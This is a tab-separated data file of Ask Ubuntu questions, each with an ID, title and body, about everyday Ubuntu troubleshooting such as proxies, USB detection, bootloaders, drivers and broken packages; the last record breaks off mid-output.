406721	how to configure ubuntu server to use a proxy server	i have 2 instances ( proxy_server & web_user ) hosted on ec2 , both running ubuntu server 12.04 . on one of the instances ( proxy_server ) i have squid installed . i want to use proxy_server as a proxy for the other instance ( web_user ) . under normal circumstances in ec2 , web_user would be using a transparent proxy which would redirect the requests to websites on the internet . what i want is to route those requests via the proxy_server through squid . additionally i want this to happen for all tcp connections . i have tried configuring http_proxy and http_proxy in etc/environment . but that would be for only http requests . so a wget will work fine but a normal socket connection to the same website would n't . i have also tried port forwarding and tunneling to have a socks proxy running on web_user tunneling to squid on proxy_server . but this brings back me to point 1 . how do i make web_user to be aware of proxy_server ? i can make firefox in web_user to be aware of proxy_server but how do i do that same system wide ?
406722	usb devices do n't get detected	i 've upgraded to ubuntu 13.10 . my usb ports do n't detect usb devices connected to them . when you connect and disconnect anything to/from usb ports and monitor with lsusb nothing changes . every now and then , when i reboot , it suddenly works . then it stops working again after another reboot . i tried to watch dmesg while plugging in a usb device and unplugging it , nothing changes either . i used sudo watch 'dmesg ' , also sudo tailf /var/log/dmesg .
406725	ca n't update , install new programs and upgrade ubuntu 12.04	i ca n't update ubuntu 12.04 , when i try to update i got a message says the package system is broken and even when i try with apt-get -f install in terminal , it does help a thing . what should i do ?
406730	error in installation of metis	i am a new user on the site so please forgive my mistakes . i am trying to install metis software on my workstation which has ubuntu 12.04 . i have downloaded the tar.gz file and extracted it . as soon as im trying to 'make ' the file , it is giving this error . bunty @ admin-hpz620 : ~/desktop/harsh/metis-5.1.0 $ make /bin/sh : 1 : syntax error : `` ; ; '' unexpected ( expecting `` fi '' ) make : *** [ all ] error 2 thanks in advance
406734	dayz on ubuntu 13.10	i recently bought the game dayz on my computer using steam . i have recently installed ubuntu 13.10 on my computer , and it says dayz ca n't be played on my platform . i am a ubuntu beginner . is there anything i can do to get it to play in ubuntu ?
406737	ca n't find firefox update in ubuntu update manager	i 'm using ubuntu 12.04 and my firefox version is 14.0.1 . since because of this version i ca n't install firebug . so for upgrading it i searched at the help- > about in the browser window , but there is no update option . then i searched in the ubuntu update manager , and there are listed very many updates , but i did n't find `` firefox browser update '' . i 'm new to ubuntu , and i do n't know how to work in the terminal so i have n't tried that .
406740	i use grep file to search disk file but have many file does n't exist alert	i use this command : sudo grep -r 'mode_t st_mode' but have many alerts that say many files do not exist . grep : /usr/share/pyshared/numpy/core/include/numpy/cfunc.h : do not have that file or directory . ... . grep : /usr/share/omf/totem/totem-uk.omf : do not have that file or directory . there are many similar alerts . how should i solve this problem ? and one person say should use '' sudo grep -r 'mode_t st_mode ' /* 2 > dev/null '' to cut the noise . but my question is , how to delete those invalid file ? one by one ?
406742	unable to install wine in ubuntu	computer @ ubuntu : ~ $ sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.2 e : broken packages
406748	install an efi from ubuntu on a macbook pro	i 'm going to describe my problem in full , and then ask the question for the solution that i think i 've come up with . if someone has a better different way to do this , that would be much appreciated as well . i am installing ubuntu 13.10 onto a macbook pro 9.2 i have done this twice before , with the caveat being that , when i did this before , i just set up a dual boot . now , i am trying to setup ubuntu exclusively , and also trying to encrypt my hard drive . i tried installing mac os first , and then setting up a second partition , and creating a refit partition , and then deleting the first partition , but the ubuntu installer wo n't let me encrypt my hard drive if i do it that way . i can get through the installation process just fine , but when it comes time to reboot , i run into the blank white screen followed by a flashing folder with a question mark on it . looking into it , i believe what i need , is an efi that i can set up from my newly created ubuntu partition . so my question is this , is there an efi that i can set up from ubuntu , that will be recognized by a macbook hardware , and run on startup ? note : i was able to get back in to ubuntu , by rebooting , and `` trying ubuntu '' from my flash drive , and then logging in to my encrypted hard drive , but i no longer have mac os installed on my computer , so solutions that involve having mac os installed , while not impossible , are not easy .
406750	how do i reset root password	i accidentally deleted all admine accounts and when i create a new account it asks for root password i looked up on the internet and i edited the grub menu and typed rw inti=/bin/bash i also tried su root but t donât know the password nothing happened and i do n't have admin privileges because there is no admin account i login from the guest secession what should i do ? ? ? ! ! it 's driving me nuts
406751	kgpg failed to start .	my first time posting . please forgive me if i am off the make in any fashion . setup : dell ubuntu 13:10 situation : i installed kgpg and specified that the key are to be filed in a truecrypt folder on my desktop . i had the truecrypt folder open at the time of installation and ran the program . i created my new keys . everything looked and worked perfectly . now when i try to reopen kgpg i get the following : '' gnupg failed to start you must fix the gnupg error first before running kgpg details : gpg option file 'home/xxxx/.gnupg/pgp.config ' no such file or directory '' so it looks like kgpg tried to locate the 'home/xxxx/.gnupg/pgp.config ' file in the wrong place ( not in the truecrypt folder ) i see that there is now a 'home/xxxx/.gnupg/pgp.config ' folder in that place and in my truecrypt folder but kgpg does not recognise either . is there an easy command line fix for this ? i am very new to this but i think kgpg just needs to be told where to find the folder ... but i do not know how to do this . thank you in advance . : )
406753	'low disk space ' warning received when disk is nowhere near full	i noticed this warning because it stops one of my applications ( boinc ) from being able to work on a number of boinc projects . the 'low disk space ' warning says that i have 1.1gb remaining . i can not work out where that number comes from . the os is installed on sda1 which is a 256gb ssd . i use a hdd sdb1 of 1000gb ( 984.4gb formatted ) to store my own bits and bobs . i 've been looking for the problem but i 'm obviously out of my depth . sda1 shows in properties as having 31.8gb used with 151.2gb free . sdb1 shows in properties as having 375.2gb used with 559.2gb free . what the devil is going on ?
406756	how to install python 3.x.x . properly	i have installed and configured python from online tutorials , python books , and other various sources in the past only to find myself digging through forums when things go wrong and piecing various information together to try and reach my objective . which is a clean installation/configuration of python 3.x.x that does not interfere with the system 's default interpreter , has pip , easy install , distribute tools , and virtualenv all properly configured and working ; can be used side-by-side with the system 's python interpreter , is installed in the /opt/ directory ( the proper location ) , is named clearly in the /opt/ directory ( e.g . python3.3.0 , python3.3.1 , python3.3.2 ) , and can be called from the terminal window without using alias ( i.e . the path is setup and working ) . this is a lot of criteria , but is the setup i 'm looking for . when following online tutorials , i can typically achieve a few of these , but never all of them . the closest tutorial i have found so far is here ( how to install python 3.3 ? ) , but it still does n't provide enough clarification or has broken steps . for example , the answer with the most votes ( by sergey and minerz029 ) has the following issues : does not explain how to setup pip , easy install , distribute tools , and virtualenv . it appears impossible with those steps because they do not include setting up the proper dependencies before compiling to get distribute tools ( necessary to get pip ) prior to compiling ( as indicated here ( http : //stackoverflow.com/questions/18833442/installing-distribute-for-python-3-3 ) . but then when trying to follow the second link , openssl-devel doesnt seem available from apt-get . does not setup the python path but rather uses a systemlink . all the tutorials i follow start a chain reaction in going from forum to forum with no clear answer because everyone uses different steps , commands , methodologies etc . and often leave out key points that start the hunt all over again . can anyone take a look at the first link and explain how to get pip , easy_install working ? i have also followed the second author 's instructions ( i.e . âbooleanâ ) but his steps break at step 3 and appears to exclude key points between steps 2 and 3 in switching directories .
406766	what editors are available for writing coffeescript ?	i 'm looking for a good editor for coffeescript . what i want is syntax highlighting and auto indentation when a new line is entered , like idle for python . i 've already tried the gedit-coffeescript plugin , but it does only syntax highlighting not the indentation formatting . i have not tried emacs , as i 'm not comfortable with it . i hope someone would know a good editor for writing coffeescript .
406767	terminal is blank on second user account	this is a weird problem : after moving /home to a new disk , my gnome terminal does not execute any command . it is just blank : it does not contain the usual name @ computer : ~ # i can enter text in it but nothing is executed . i do n't have this problem on my main user account or new user account that i just created . i also installed and tested other consols but they had the same problem . what could be wrong and how can i fix it ?
406776	use wifi from iphone via thethering	im trying to get my friend to try out elementary os luna ( based on ubuntu 12.04 ) but the problem at our school is that the wifi dose n't support linux , only windows , mac and android . therefor i get my internet by connecting to wifi from my phone ( galaxy s ii ) and then thethering it to my computer . can i do the same with an iphone 5 ?
406778	how safe is it to transfer sensitive information over tor browser bundle on a restricted network ?	i am using the tor browser bundle in ubuntu from a client machine on a restricted network . in part , i do this because it appears that tbb 's native encryption allows me to bypass certain network filters which can not inspect my data packets . however , how safe is it to transfer sensitive information ( data that i publish , sites i visit , pages i read , etc . ) from within a restricted network over the tor browser bundle ?
406779	tty wo n't respond to anything at all	well , i seem to be a hard drive killer . several months ago , i had a laptop with harddrive problems , which required me to replace the disk . now , i have a separate laptop , which i has a bunch of bad sectors ( i do n't know how long they 've been bad , but i accidentally dropped the computer a few day ago ) , resulting in a bunch of bad blocks . i 've managed to remap these bad blocks using e2fsck -y -c -f /dev/sda5 , but for some reason i ca n't get tty working again . whenever i enter any of the tty screens , i am greeted with a blinking cursor , which resembles a white underscrore . from there , the computer completely ignores anything i try to type . tty does n't even so much as ask me to enter my username/password ( if i try to enter my password anyway , i will again be ignored ) . all i can do is switch back to my desktop using ctrl+alt+f7 . since tty is part of the gnu core utilities , i decided to try running repair coreutils ( `` repair '' is a bash alias , which in turn runs sudo apt-get -y -- force-yes -- reinstall install ) , but that did n't help at all . i 've also tried sudo dpkg-reconfigure coreutils , and again ... no dice . the only thing i have n't tried yet is removing coreutils altogether , running 'apt-get autoremove -- purge ' , and reinstalling coreutils from scratch ( i 'm too scared to even so much as try something like this , unless necessary ! ) . i 'm currently running the cinnamon desktop ( lightdm login ) , on ubuntu 13.10 i386 desktop editon . also , if i run sudo -i login from gnome-terminal , it pretty much works as expected . ps : i do n't want to buy yet another hard drive , as i 'm only working part time , and could use the money for other things . update : i think the problem might lie with getty ( or agetty ) , as everytime i run 'getty 0 ' , i get a segmentation fault error . does anyone know how to reinstall getty ? sudo apt-get install getty does n't seem to work ( e : unable to locate package getty ) , likewise for agetty .
406782	auto mount webdav folder	i want to auto mount webdav folder with bash script . my server resources very pool so i have a memory problem about webdav . therefore , i have to umount webdav folder for clear cache and memory . but , i have to manuel mount webdav folders , after than umount command . because , system ask to me credentail for webdav folder so , i ca n't do it with bash script . i edit ~/.davfs/secret file as following format ; http : //address username password after than , i uncomment line secrets ~/.davfs2/secret in /etc/davfs2/davfs2.conf file . but , system still ask to me credential information . how can i auto mount webdav ? thanks
406783	huawei e1750 not working on xubuntu 13.10	i 'm trying to get my huawei e1750 working . i 've tried the solutions described here : http : //ubuntuforums.org/showthread.php ? t=1246293 & page=5 but without success . the led is flashing green and lsusb | grep 'huawei ' says : bus 003 device 005 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800/e173 ( hspa modem ) using usb_modeswitch -h -v 12d1 -p 1446 produces the following output : looking for default devices ... found matching product id adding device found device in default mode , class or configuration ( 1 ) accessing device 000 on bus 003 ... getting the current device configuration ... error getting the current configuration ( error -1 ) . assuming configuration 1 . using first interface : 0x00 using endpoints 0x01 ( out ) and 0x81 ( in ) inquiring device details ; driver will be detached ... looking for active driver ... no driver found . either detached before or never attached could not claim interface ( error -1 ) . skipping device inquiry error : could not get description string `` manufacturer '' error : could not get description string `` product '' usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : product : serial no . : not provided -- -- -- -- -- -- -- -- -- -- -- -- - sending huawei control message ... error : sending huawei control message failed ( error -1 ) . aborting . any help appreciated . = )
406786	safe to upgrade with encrypted disks	i am running ubuntu 13.04 server and i have it set up with lvm and encrypted disks . is it safe to 'do-release-upgrade ' or will the disk encryption interfere with the process ?
406787	best way add nopasswd vagrant user ?	what is the better way add nopasswd with vagrant user ? way 1 : groupadd -r admin usermod -a -g admin vagrant cp /etc/sudoers /etc/sudoers.orig sed -i -e '/defaults\s\+env_reset/a defaults\texempt_group=admin ' /etc/sudoers sed -i -e 's/ % admin all= ( all ) all/ % admin all=nopasswd : all/g ' /etc/sudoers way 2 : # set up sudo echo % vagrant all=nopasswd : all > /etc/sudoers.d/vagrant chmod 0440 /etc/sudoers.d/vagrant # setup sudo to allow no-password sudo for `` sudo '' usermod -a -g sudo vagrant or maybe there are even better ?
406788	wicd net-speed issues	so , after a couple days of customising ubuntu 12.04 on my toshiba-nb505 netbook , i realized the internet speeds were not what they were suppose to be . after looking into it , i came across an article stating that installing wicd would help this bottle-necked internet speed for certain computers . my netbook being an atheros driver user , it was bound to help in some way . after getting wicd installed and purging the network-manager..i tried to download again ( through steam ) and my net speed was fixed ! ... so i thought ... after downloading a really small indi game i have , the speed was bottle-necked again . right back down to where it was when i was still using the default network-manager . i have ran speed tests throughout a couple devices in my home and this netbook ( being the only linux based ) is the only device i have with dramatically dropped speeds . soo , my main question is..how should i go about fixing this ? wicd seemed to work for at least 10 minutes before dropping off again . i 've tried restarting the device , but i 'm no ubuntu pro , so that 's all i could think of doing . thanks ahead of time.. -sf
406792	list all mac addresses and their associated ips in my local network ( lan )	how can i list all mac addresses and their associated ips of the machines connected to my local network ( lan ) ? any suggestions ?
406797	unsecured desktop sharing	can anyone advise me of the best way to get around mongrel hackers . i came home to find my mouse pointer merrily moving across the screen , opening disgusting web pages and what looked like trying to run a script file . i immediately switched the machine off and removed the network cable however when i opened firefox it would just go to porn sites.. logged in as another user and am now running beachbit and clamav as sudo to clean it out however my browser is still stuffed.. any ideas people , i need that desktop connection for my work . i expect i will have to re-install ubuntu ?
406800	problem installing huwaei e303c modem driver	i extracted the huwaei linux driver on my desktop directory and then ran the following commands : cd desktop/driver ./install /home/ < name > /desktop/driver driver copy start sta_path_flag= . sta_path_full=/home/pratik/desktop/driver/install start_path_driver=/home/pratik/desktop/driver current install from ./install install_path=/home/pratik/desktop driver copy end make -c src/ clean make [ 1 ] : entering directory `/home/pratik/desktop/driver/ndis_driver/ndis_src/src' rm -rf *.o *.ko *~ core* .dep* . *.d . *.cmd *.mod.c *.a *.s . *.flags .tmp_versions module.symvers modules.symvers *.order /home/pratik/desktop/driver/ndis_driver/ndis_src/src/add_header.sh `` clean '' `` /lib/modules/3.8.0-19-generic/build/include/linux/usb '' rmmod -f hw_cdc_driver make [ 1 ] : leaving directory `/home/pratik/desktop/driver/ndis_driver/ndis_src/src' make -c src/ modules make [ 1 ] : entering directory `/home/pratik/desktop/driver/ndis_driver/ndis_src/src' # /home/pratik/desktop/driver/ndis_driver/ndis_src/src/add_header.sh `` modules '' `` /lib/modules/3.8.0-19-generic/build/include/linux/usb '' make -c /lib/modules/3.8.0-19-generic/build subdirs=/home/pratik/desktop/driver/ndis_driver/ndis_src/src modules make [ 2 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/pratik/desktop/driver/ndis_driver/ndis_src/src/hw_cdc_driver.o make [ 2 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make [ 1 ] : leaving directory `/home/pratik/desktop/driver/ndis_driver/ndis_src/src' make -c src/ install make [ 1 ] : entering directory `/home/pratik/desktop/driver/ndis_driver/ndis_src/src' # install -m 744 -c hw_cdc_driver.o /lib/modules/3.8.0-19-generic/kernel/drivers/usb/net # depmod -a # modprobe hw_cdc_driver /home/pratik/desktop/driver/ndis_driver/ndis_src/src/add_header.sh `` install '' modprobe hw_cdc_driver make [ 1 ] : leaving directory `/home/pratik/desktop/driver/ndis_driver/ndis_src/src' # [ 31 ; 1m install ndis driver failed . the compiling environment is not all ready . please check gcc , make and kernel buid ( /lib/modules/3.8.0-19-generic/build ) to be all installed ? # [ 34 ; 1mnow please enter any key to finish other installations. # [ 0 ; 0m # [ 31 ; 1mndis is disabled , and only modem can be used. # [ 0 ; 0m usbserial_target_path = acm_target_path = have usb_modeswitch rules to huawei datacard : count=1 rulesfile =/lib/udev/rules.d/40-usb_modeswitch.rules count_start=1 count_end=0 3 ttyusb % n count=3 2-1.3:1.3 unbind and bind option count_end=2 2-1.3:1.2 unbind and bind option count_end=1 2-1.3:1.0 unbind and bind option count_end=0 addrunlevel=/etc/rc5.d addrunlevel=/etc/rc3.d addrunlevel=/etc/rc2.d addrunlevel=/etc/rc4.d
406801	dependencies still exist in `` dpkg -l '' after running `` apt-get remove dependencies-names ''	i suspected that installing xfce4 cause some issues in ubuntu so i removed them using apt-get remove xfce4 xfce4-goodeis . but when i ran 'dpkg -l ' i still can see some libraries and packages for xfce4 : $ dpkg -l | grep -i xfce rc libexo-1-0 : amd64 0.10.2-2 amd64 library with extensions for xfce rc libgarcon-1-0 0.2.1-1 amd64 freedesktop.org compliant menu implementation for xfce rc libxfce4ui-1-0 4.11.0-0ubuntu1~ppa0.13.10.1 amd64 widget library for xfce - gtk+2 variant rc libxfce4ui-common 4.11.0-0ubuntu1~ppa0.13.10.1 all common files for libxfce4ui rc libxfce4util6 4.10.1-1 amd64 utility functions library for xfce4 rc libxfcegui4-4 4.10.0-2 amd64 basic gui c functions for xfce4 rc libxfconf-0-2 4.10.0-2 amd64 client library for xfce4 configure interface rc mousepad 0.3.0-2 amd64 simple xfce oriented text editor rc thunar 1.6.3-1ubuntu1 amd64 file manager for xfce rc xfce4-appfinder 4.10.1-1 amd64 application finder for the xfce4 desktop environment rc xfce4-clipman 2:1.2.3-2ubuntu1 amd64 clipboard history utility rc xfce4-mixer 1:4.10.0-1ubuntu2 amd64 xfce mixer application rc xfce4-notes 1.7.7-3ubuntu2 amd64 notes application for the xfce4 desktop rc xfce4-panel 4.10.1-1ubuntu1 amd64 panel for xfce4 desktop environment rc xfce4-power-manager 1.2.0-2ubuntu1 amd64 power manager for xfce desktop rc xfce4-session 4.10.1-1ubuntu1 amd64 xfce4 session manager rc xfce4-settings 4.11.1-0ubuntu1~ppa0.13.10.1 amd64 graphical application for managing xfce settings rc xfce4-terminal 0.6.2-3ubuntu1.1 amd64 xfce terminal emulator rc xfce4-volumed 0.2.0-0ubuntu1 amd64 volume keys daemon rc xfdesktop4 4.11.2-0ubuntu1~ppa0.13.10.1 amd64 xfce desktop background , icons and root menu manager rc xfwm4 4.11.1-0ubuntu1~ppa0.13.10.1 amd64 window manager of the xfce project i copy-pasted all these packages\libraries to form an apt-get remove command to remove all of these dependencies , and the command ran normally , but running dpkg -l | grep -i xfce showed these dependencies again ! why are these dependencies still installed ?
406805	bumblebee and libglx on ubuntu 12.04 , version mismatch	i tried to setup bumblebee , but until now i get this message : me @ 105999hmolt : /usr/lib/nvidia-current-updates/xorg $ optirun glxspheres primus : fatal : broken glx on main x display i 've noticed that some libraries could n't be found : me @ 105999hmolt : /usr/lib/nvidia-current-updates/xorg $ ldd * libglx.so : linux-vdso.so.1 = > ( 0x00007fff059f2000 ) libnvidia-tls.so.304.88 = > not found libnvidia-glcore.so.304.88 = > not found libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f3a346c0000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f3a344bc000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f3a355c0000 ) libglx.so.304.88 : linux-vdso.so.1 = > ( 0x00007fff04bff000 ) libnvidia-tls.so.304.88 = > not found libnvidia-glcore.so.304.88 = > not found libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f93a2d4d000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f93a2b49000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f93a3c4d000 ) nvidia_drv.so : linux-vdso.so.1 = > ( 0x00007fff14bff000 ) libm.so.6 = > /lib/x86_64-linux-gnu/libm.so.6 ( 0x00007f16d50a3000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f16d4ce4000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f16d4adf000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f16d5db9000 ) the corresponding xorg.0.log can be found here http : //pastebin.com/rbrr6e74 the missing libraries are installed on my system , but could they be from the wrong package ? does anybody know where i can get the md5 sums ? 9b6da122a85bfe2f4db8897c0f5ea7b3 /usr/lib/nvidia-current-updates/libnvidia-tlibnvidia-tls.so.304.88 9b6da122a85bfe2f4db8897c0f5ea7b3 /usr/lib/nvidia-current-updates/libnvidia-tls.so.304.88 82c630b36b20ff68f1017a7bd0a75599 /usr/lib/nvidia-current-updates/tls/libnvidia-tls.so.304.88 9b6da122a85bfe2f4db8897c0f5ea7b3 /usr/lib/x86_64-linux-gnu/xorg/x11-extra-modules/libnvidia-tls.so.304.88 9b6da122a85bfe2f4db8897c0f5ea7b3 /usr/lib/x86_64-linux-gnu/xorg/x11-extra-modules/libnvidia-tls.so.304.88.old 9b6da122a85bfe2f4db8897c0f5ea7b3 /usr/lib/xorg/modules/libnvidia-tls.so.304.88 9b6da122a85bfe2f4db8897c0f5ea7b3 /usr/lib/xorg/modules/extensions/libnvidia-tls.so.304.88 af8b194067c6120f389b1061b5dd45b1 /usr/lib32/nvidia-current-updates/libnvidia-tls.so.304.88 f2ab26d6c0e49b512bdf102e2d1a4065 /usr/lib32/nvidia-current-updates/tls/libnvidia-tls.so.304.88 a589f3081fbd537bc1305644115eb4cc /usr/lib/nvidia-current-updates/libnvidia-glcore.so.304.88 9b4371241ccc86a046d6e2ad65210ec1 /usr/lib32/nvidia-current-updates/libnvidia-glcore.so.304.88
406806	what does the pipe | indicate in apt-cache rdepends ?	as i understand it , rdepends lists packages which depend on the specified package . example : $ apt-cache rdepends abiword abiword reverse depends : abiword : i386 xubuntu-desktop |python-carquinyol-0.96 pkpgcounter lubuntu-desktop junior-writing gnome |freemind-doc abiword-plugin-mathview abiword-plugin-grammar abiword-dbg in this output , what does | mean ? as per this question , it means 'or ' in apt-cache depends , however that does n't seem relevant here ( package1 or package2 depending on abiword is impossible ) .
406807	i upgraded from ubuntu 12.10 to ubuntu 13.04 and its taking too long to restart	so , everything is done and it asked me to restart after installing ubuntu 13.04 so i did . but its been an hour now and still all i see is the wallpaper . is this normal ? what should i do ?
406811	how to use english as language but belgian ( or other ) keyboard layout during ubuntu 12.04 server installation ?	i ca n't set the belgian keyboard layout during installation without setting the language to dutch . i really do n't like to use ubuntu server in any another language besides english , it 's really confusing .
406815	remote desktop connection color not proper	i am using lubutu 13.10.i have installed remima in it.when i connect to remote connection which is windows server 2008 the display is not proper.it has different colour some weird colours.i have updated video drivers .
406818	dual boot ( win8.1 + ubuntu 13.10 ) boots directly to windows	i have a ssd drive and i 've installed windows 8.1 on it . now , i decided to install ubuntu 13.10 on the same drive , splitting it into two partitions . the ubuntu installer does not recognize the windows installation , however . i manually created the partition ( and swap ) , and installer completed as it should . now , when i boot the computer , it goes straight to windows just like before installing ubuntu , there 's no boot loader screen whatsoever . i tried reinstalling the ubuntu , using both `` install ubuntu '' and `` try ubuntu '' options ( live and non-live , in other words ) , but it did n't work .
406819	grub installed over refit after installing ubuntu 12.04 on imac7,1	i just installed ubuntu 12.04 on my old imac7,1 . the first thing i did was install refit from osx . after that , i installed ubuntu from a livecd and all went apparently fine . the problem is that grub shows up instead of refit and there 's no way to boot osx because when i choose osx from the grub menu nothing occurs . i have found this topic that seems to talk about this problem but it 's my first ubuntu installation on a mac computer and i do n't want to mess the things up . ubuntu installed grub over refit and also this is the answer given from iamwpj , that seems to be my solution but i do n't know how to do it . i actually figured this out . the easiest way in any situation where grub overwrites refit is to hit c when the grub screen loads . this will bring up the grub command line . typing exit here will exit grub and show you refit . from here a boot into osx will allow you to uninstall grub and install refind . should i uninstall grub from ubuntu ? and , after that , will refit show up ? thanks .
406820	recent media not updated in vlc when opening file from nautilus	when i use ctrl+o from within vlc to play a file , it will save the file to the list displayed in the open recent media menu . but when adding file to vlc via nautilus it does not get added to open recent media . is there a way to add from nautilus to vlc ? or is this a bug ( feature ) that i should report to vlc ?
406822	how to download ubuntu iso for dell laptop	i bought dell vostro m5460 ( corei3 2.5ghz ) . ubuntu was not pre-installed in this machine . how can i download the preloaded ubuntu 12.04 iso ( special build for dell ) ? ? i googled it but did n't find any useful link .
406823	winmail.dat attachments on evolution ( ubuntu gnome 13.10 )	evolution does n't show the attachments in the mails sent from outlook , instead it shows a winmail.dat file . i have already installed evolution-plugins-experimental and restarted evolution . i also rebooted the computer completely , but there is no tnef-attachments plugin listed under edit- > plugins , and the emails showing still winmail.dat as attachment . i am using ubuntu gnome 13.10 distribution . i do n't know how to solve this problem so that i can see the attachments from outlook users .
406825	how can i use java mobile phone 's camera as a webcam ?	in windows there is a software called `` mobiola webcam '' for use a mobile cam as a webcam . is there any way for linux ( ubuntu 12.04 lts ) ?
406826	ubuntu does n't load desktop at all after login screen	i 'm using ubuntu 12.04 for more than 1 year on my dell n5010 laptop . it was ok yesterday morning , but when i wanted to save my virtualbox session , it gaves me an error ( i do n't remember exactly but it was about saving in low disk ) and after that i missed my whole desktop . after i restarted my laptop , could n't load my main user but the guest user works flawlessly . my mouse is enabled there , but i ca n't have my desktop properly . i 've tried all the solutions that found in this forum but none of them were suitable for this problem . let me list the things i 've done : upgraded all the packages removed lightdm and reinstalled it remove all the ati card packages removed whole compiz configuration for the user removed compizconfig-setting-manager and reinstalled it unity wo n't load at all with unity -- reset , unity -- replace , setsid unity at first i thought this problem is for the low space . so i moved some of my files and deleted some by using ctrl+alt+f1 and made 22g new space on root.result of df -h : > filesystem size used avail use % mounted on /dev/sda3 45g 20g 23g 47 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 764m 948k 764m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 292k 1.9g 1 % /run/shm /dev/sda8 81g 29g 52g 36 % /server none 1.9g 52m 1.9g 3 % /tmp/guest-dxl9aq /dev/sda6 81g 78g 2.8g 97 % /media/software /dev/sda9 76g 71g 4.5g 95 % /media/tutorials /dev/sdc1 7.6g 4.9g 2.7g 65 % /media/4861-3cf0 /dev/sda10 11g 8.8g 1.8g 84 % /media/new volume /dev/sda5 81g 77g 3.5g 96 % /media/install however i 've tried all the desktops that i 've installed but only blackbox and recovery-mode work . i think it 's a problem with dbus-launcher because when i want to load compizconfig-setting-manager , it says `` ca n't connect to dbus-deamon '' . i went through unity does n't load , no launcher , no dash appears and tried most of the replies but could n't get to a proper solution . these are the steps : export display=:0 ccsm result : backend : ini integration : true profile : default adding plugins initializing core options ... done segmentatui fault ( core dumped ) then : unity -- reset result : checking if settings need to be migrated ... no checking if internal files need to be migrated ... no unity-panel-service : no process found backend : gconf integration : true profile : unity adding plugins initializing core options ... done initializing composite options ... done warning : unity currently default profile , so switching to metacity while resetting the values segmentatui fault ( core dumped ) then unity -- replace result : unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done segmentatui fault ( core dumped ) then unity -- reset-icons result : unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done segmentation fault ( core dumped ) i 've tried some other solution on that page like installing packages or removing configuration and such things but none of them was helpful .
406832	is there any software which is tender on ram , and can remotely shut down my pc ?	is there any software which is tender on ram , and can remotely shut down my pc ? i am using lubuntu 13.10
406835	13.04 no suitable module for running kernal found	my machine froze on my screensaver yesterday so i forced a shutdown . now i ca n't reboot into my gui - tty works . the fail message i receive on startup is `` no suitable module for running kernel found '' . i 'm running kernel 3.12.2 , i have an optical drive , so can repair from a live cd if necessary . i can also boot into recovery mode where i 've run fsck , clean ( admittedly /boot has only 10mb free - been trying to fix that ) and dpkg . on a start from recover mode my fail message says `` starting virtualbox kernel modules '' . any help would be wonderful , and i 'll be sure to send plenty of love your way ! update : i have purged virtualbox from root in recovery mode and have tried rebooting using kernel 3.12.2 - crashes at `` starting acpi daemon , '' and 3.8.0.34 and 35 where it crashes at `` stopping save kernel messages . '' other kernels installed are : 3.8.0-26 and 3.8.0-25
406836	update disables graphic interface	i 've updated ubuntu few days ago to ubuntu version 12.04.3 lts ( gnu/linux 3.2.0-58-generic-pae i686 ) and now i get stuck with a full screen terminal right after de loading screen . identifying the problem as this answer suggested startx prompted many informations among wich : nvidia : api mismatch : the nvidia kernel module has version 304.88 , but this nvidia driver component has version 304.108 . so it seems that getting the right driver version would solve my problem solving the problem followed these instructions : remove nvidia related stuff with sudo apt-get purge nvidia* then restart machine with sudo shutdown -r now
406838	unmet dependencies and huge amounts of errors , please help !	i try to do this : sudo apt-get -f install and then this happens : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : initramfs-tools the following packages will be upgraded : initramfs-tools 1 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 13 not fully installed or removed . need to get 0 b/49.2 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on initramfs-tools-bin ( < < 0.99ubuntu13.1.1~ ) ; however : version of initramfs-tools-bin on system is 0.99ubuntu13.4 . dpkg : error processing initramfs-tools ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of udev : udev depends on initramfs-tools ( > = 0.92bubuntu63 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing udev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of dmsetup : dmsetup depends on initramfs-tools ; however : package initramfs-tools 